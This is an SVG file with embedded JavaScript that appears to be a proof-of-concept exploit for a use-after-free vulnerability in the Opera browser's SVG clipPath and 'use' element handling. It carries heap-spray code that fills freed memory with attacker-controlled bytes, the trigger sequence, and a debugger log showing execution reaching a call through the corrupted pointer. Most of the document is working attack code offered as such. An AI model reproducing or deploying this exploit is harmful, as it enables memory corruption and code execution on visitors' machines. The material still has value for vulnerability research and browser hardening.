<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w0.org/1999/xlink"> <g id="group"> <defs> <clipPath id="clip-circle" clip-path="url(#clip-rect)"> </clipPath> <clipPath id="clip-rect"> </clipPath> </defs> <circle id="rect" x="10" y="10" width="100" height="100" fill="green" /> </g> <script><![CDATA[ //Author=Cons0ul var b = new Array(); // this is our spray function where spray is allocated on LFH with exact size 0x78 // so 0x78 size of block is created so far we are creating 0x50000 blocks // to create 0x78 blocks we are using ArrayBuffer(); function feng_shui(){ for(i=0;i<1000;i++)window.opera.collect(); // <----- garbage collection for(i=0;i<0x50000;i++){ payload = new ArrayBuffer(0x78) // use 0xb0 for 64bit machine payload[0]=0x6c payload[1]=0x03 payload[2]=0xfe payload[3]=0x7f b.push(payload) } } // bug is use after free in handling of (use tag + clippath) witch try to access freed object // document.getElementById('rect').setAttribute('clip-path',"url(#clip-circle)"); var c = document.createElement('use'); c.setAttribute("xlink:href","rect") feng_shui(); document.getElementById('clip-rect').appendChild(c); document.getElementById('rect').style.clipPath="url(#clip-circle)" // <----- bug window.opera.collect() // <------ gc() frees the allocation feng_shui(); // <------------ we allocate our code at freed memory // at the end it tries freed block witch contains our data window.location.href=window.location.href; /* idc !heap -p -a ecx address 077c45e0 found in _HEAP @ b40000 HEAP_ENTRY Size Prev FlagsUserPtr UserSize - state 077c45d8 0010 0000[00] 077c45e000078 - (free) PS C:\Users\cons0ul> idc db ecx 077c45e092 48 fe 7f 00 00 00 00-00 00 00 00 00 00 00 00.H.............. 077c45f000 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00................ 077c460000 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00................ 077c461000 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00................ 077c462000 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00................ 077c463000 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00................ 077c464000 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00................ 077c465000 00 00 00 00 00 00 00-89 d0 6a 5b 00 00 00 88..........j[.... PS C:\Users\cons0ul> idc r eax=7ffe4892 ebx=00000001 ecx=077c45e0 edx=00000000 esi=0372e590 edi=01d40048 eip=6b8c998b esp=0013e334 ebp=00000000 iopl=0 nv up ei pl nz na po nc cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00010202 Opera_6b430000!OpGetNextUninstallFile+0xf8583: 6b8c998b ff5008calldword ptr [eax+8]ds:0023:7ffe489a=???????? */ ]]></script> </svg>
体验盒子
